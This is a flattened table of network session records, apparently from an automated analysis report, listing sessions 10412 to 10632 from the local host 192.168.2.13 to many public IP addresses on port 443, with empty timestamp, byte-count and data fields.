                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10412192.168.2.134313452.86.26.66443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10413192.168.2.1340988206.28.23.192443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10414192.168.2.135549467.201.20.100443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10415192.168.2.1339664134.205.102.241443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10416192.168.2.1358506168.117.113.201443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10417192.168.2.133285653.114.100.255443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10418192.168.2.1350708220.193.162.244443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10419192.168.2.1349828175.50.114.92443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10420192.168.2.1353546144.25.124.234443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10421192.168.2.134529827.167.218.185443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10422192.168.2.1339528223.177.224.124443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10423192.168.2.133351498.157.253.122443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10424192.168.2.1346304105.69.90.221443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10425192.168.2.1340274119.18.54.132443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10426192.168.2.1337628162.134.210.211443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10427192.168.2.1343784205.38.164.207443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10428192.168.2.134553896.30.181.73443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10429192.168.2.1360700143.136.150.106443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10430192.168.2.1336962188.131.247.145443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10431192.168.2.134796493.185.227.153443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10432192.168.2.1342548173.36.147.26443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10433192.168.2.1358128218.95.76.234443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10434192.168.2.1344252115.168.188.14443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10435192.168.2.1354114192.115.48.74443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10436192.168.2.1343172159.0.8.112443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10437192.168.2.134229046.26.223.245443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10438192.168.2.1337246139.4.211.11443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10439192.168.2.1350506179.55.205.87443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10440192.168.2.1346030128.112.253.198443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10441192.168.2.1345838122.252.125.252443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10442192.168.2.1360856143.102.120.218443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10443192.168.2.1360124206.3.193.70443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10444192.168.2.135110640.182.138.246443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10445192.168.2.1346698220.244.118.209443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10446192.168.2.1346202207.122.224.180443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10447192.168.2.133590685.95.69.64443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10448192.168.2.1357376141.250.203.50443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10449192.168.2.1358206179.155.130.76443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10450192.168.2.135255225.35.3.209443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10451192.168.2.135416665.54.173.189443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10452192.168.2.1360224118.206.183.3443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10453192.168.2.1344334123.104.122.126443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10454192.168.2.134465042.220.120.93443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10455192.168.2.134333835.9.195.64443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10456192.168.2.136092689.46.117.84443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10457192.168.2.1355008191.145.205.187443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10458192.168.2.134435431.68.54.230443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10459192.168.2.135291063.8.161.31443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10460192.168.2.134664659.39.209.246443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10461192.168.2.1354098202.204.93.205443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10462192.168.2.133516034.106.226.51443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10463192.168.2.133906839.20.122.211443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10464192.168.2.1352034157.139.230.21443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10465192.168.2.135285491.167.17.76443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10466192.168.2.13502064.50.22.223443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10467192.168.2.1349468172.195.145.136443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10468192.168.2.1334228136.231.211.184443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10469192.168.2.1341566171.65.190.176443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10470192.168.2.1344128206.108.138.24443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10471192.168.2.1338334101.118.176.97443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10472192.168.2.134358877.228.150.49443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10473192.168.2.133596631.3.196.181443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10474192.168.2.134129836.215.44.150443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10475192.168.2.1337396170.50.250.210443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10476192.168.2.1337416123.99.209.198443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10477192.168.2.134413468.7.128.204443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10478192.168.2.1355868181.63.243.86443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10479192.168.2.1352672162.57.206.208443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10480192.168.2.133537652.247.182.228443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10481192.168.2.1346814190.1.146.188443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10482192.168.2.134886888.60.58.124443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10483192.168.2.1335986107.111.27.10443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10484192.168.2.1333854221.121.5.103443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10485192.168.2.1340042180.172.92.172443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10486192.168.2.1353820172.157.192.190443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10487192.168.2.1334246185.197.39.92443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10488192.168.2.135212837.166.64.137443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10489192.168.2.1343724209.67.209.2443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10490192.168.2.134972612.1.230.146443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10491192.168.2.1345100173.113.211.0443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10492192.168.2.13348829.155.90.127443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10493192.168.2.1347462122.17.126.97443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10494192.168.2.1355672153.127.253.78443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10495192.168.2.135343437.147.165.193443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10496192.168.2.135209242.246.47.237443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10497192.168.2.1350158134.71.44.143443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10498192.168.2.1345916180.43.150.32443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10499192.168.2.1351740131.194.61.24443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10500192.168.2.1338858185.134.85.184443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10501192.168.2.135726494.18.218.175443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10502192.168.2.1343630212.247.105.53443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10503192.168.2.135362217.129.118.253443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10504192.168.2.1353142162.209.45.62443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10505192.168.2.1359662109.168.115.96443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10506192.168.2.1348838179.100.42.98443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10507192.168.2.133979096.208.116.78443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10508192.168.2.1336122210.76.107.1443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10509192.168.2.1349764212.99.176.71443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10510192.168.2.1337430146.45.240.153443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10511192.168.2.134899089.248.159.240443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10512192.168.2.133974894.53.159.248443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10513192.168.2.1334788108.195.219.228443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10514192.168.2.1339170131.103.74.230443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10515192.168.2.134455234.240.55.218443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10516192.168.2.133415686.0.46.107443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10517192.168.2.134210453.170.6.79443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10518192.168.2.1339348136.175.158.254443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10519192.168.2.1346562219.9.36.47443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10520192.168.2.1346028122.197.199.109443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10521192.168.2.1345258192.211.7.36443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10522192.168.2.1351410203.255.233.16443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10523192.168.2.1344592169.152.243.202443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10524192.168.2.134537637.42.99.18443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10525192.168.2.135024251.239.189.62443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10526192.168.2.1342290213.46.171.190443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10527192.168.2.1340926180.11.253.24443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10528192.168.2.1358802222.18.132.55443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10529192.168.2.1341938193.171.223.11443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10530192.168.2.1355410203.93.214.184443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10531192.168.2.134135632.87.158.163443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10532192.168.2.135917613.132.201.56443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10533192.168.2.1351244186.168.151.24443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10534192.168.2.134404612.131.69.116443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10535192.168.2.1340214139.78.219.168443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10536192.168.2.134187845.76.87.32443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10537192.168.2.134536436.225.98.169443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10538192.168.2.134301647.247.118.116443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10539192.168.2.1345996126.255.222.24443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10540192.168.2.1355396192.255.69.103443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10541192.168.2.1358310141.219.59.15443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10542192.168.2.1360724108.175.130.127443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10543192.168.2.1355868108.45.117.202443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10544192.168.2.1335974181.174.104.119443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10545192.168.2.1355890110.167.166.206443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10546192.168.2.135939424.16.213.125443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10547192.168.2.1358732218.161.2.168443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10548192.168.2.1333376126.14.94.10443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10549192.168.2.133490041.137.52.8443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10550192.168.2.133650487.80.245.249443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10551192.168.2.13558484.85.249.98443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10552192.168.2.1350702219.199.247.37443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10553192.168.2.1358636217.23.25.183443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10554192.168.2.1355150205.21.53.197443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10555192.168.2.1337004160.50.9.178443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10556192.168.2.1338766114.102.155.27443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10557192.168.2.135217620.26.186.220443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10558192.168.2.133438246.173.91.173443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10559192.168.2.135270249.92.127.74443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10560192.168.2.135071024.18.104.75443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10561192.168.2.135736093.27.133.112443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10562192.168.2.133324472.78.229.23443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10563192.168.2.1342606143.111.77.88443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10564192.168.2.1352408184.68.39.219443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10565192.168.2.1334470209.129.229.185443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10566192.168.2.134815853.37.126.54443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10567192.168.2.1333340126.43.105.2443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10568192.168.2.135200457.38.43.222443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10569192.168.2.133562043.68.176.179443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10570192.168.2.1334752174.137.30.246443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10571192.168.2.1334320130.105.134.125443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10572192.168.2.134483469.22.221.33443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10573192.168.2.1336508194.83.201.88443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10574192.168.2.1360248128.145.168.248443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10575192.168.2.1347458139.27.193.86443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10576192.168.2.1334708208.146.186.170443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10577192.168.2.1341164133.249.46.17443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10578192.168.2.1350094178.5.204.80443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10579192.168.2.134512671.186.133.198443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10580192.168.2.1354270193.136.227.59443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10581192.168.2.136071832.43.128.85443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10582192.168.2.1353792128.169.33.154443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10583192.168.2.1337482168.167.43.63443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10584192.168.2.135320894.222.67.93443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10585192.168.2.1332836136.55.102.181443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10586192.168.2.1333286218.76.216.64443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10587192.168.2.1342930208.151.177.84443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10588192.168.2.136015096.236.184.146443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10589192.168.2.1342544119.133.205.113443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10590192.168.2.134725876.129.25.190443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10591192.168.2.1355934180.143.221.215443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10592192.168.2.1351772175.217.18.144443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10593192.168.2.133462025.125.44.133443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10594192.168.2.1357966182.251.225.153443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10595192.168.2.1342290212.164.109.158443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10596192.168.2.135405035.47.123.24443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10597192.168.2.134926819.68.104.43443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10598192.168.2.133708681.145.89.47443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10599192.168.2.133920494.160.76.201443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10600192.168.2.135619670.103.199.141443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10601192.168.2.1360406139.97.203.22443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10602192.168.2.1337492176.96.94.9443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10603192.168.2.133752873.19.0.113443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10604192.168.2.133640450.104.135.85443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10605192.168.2.136065093.68.46.255443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10606192.168.2.134483053.80.121.62443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10607192.168.2.13331024.140.240.141443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10608192.168.2.134910681.126.233.28443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10609192.168.2.1351506147.22.138.242443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10610192.168.2.133594818.132.154.169443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10611192.168.2.135138290.103.185.120443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10612192.168.2.1355466208.30.206.63443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10613192.168.2.1338216139.201.243.247443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10614192.168.2.1334924149.157.98.120443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10615192.168.2.1333244203.72.200.75443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10616192.168.2.1358384221.228.244.6443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10617192.168.2.1341226116.35.216.192443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10618192.168.2.134184688.248.72.85443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10619192.168.2.134679885.151.176.172443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10620192.168.2.135299478.89.210.67443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10621192.168.2.1358350113.178.80.80443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10622192.168.2.1336856206.26.3.107443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10623192.168.2.1334862196.84.100.17443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10624192.168.2.135073280.228.209.85443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10625192.168.2.1354224178.251.65.235443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10626192.168.2.1347170163.3.174.107443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10627192.168.2.13526348.129.202.103443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10628192.168.2.133862018.88.160.9443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10629192.168.2.136074891.198.237.178443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10630192.168.2.1346462121.81.76.236443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10631192.168.2.1343708107.184.176.199443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10632192.168.2.1359564100.18.248.191443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
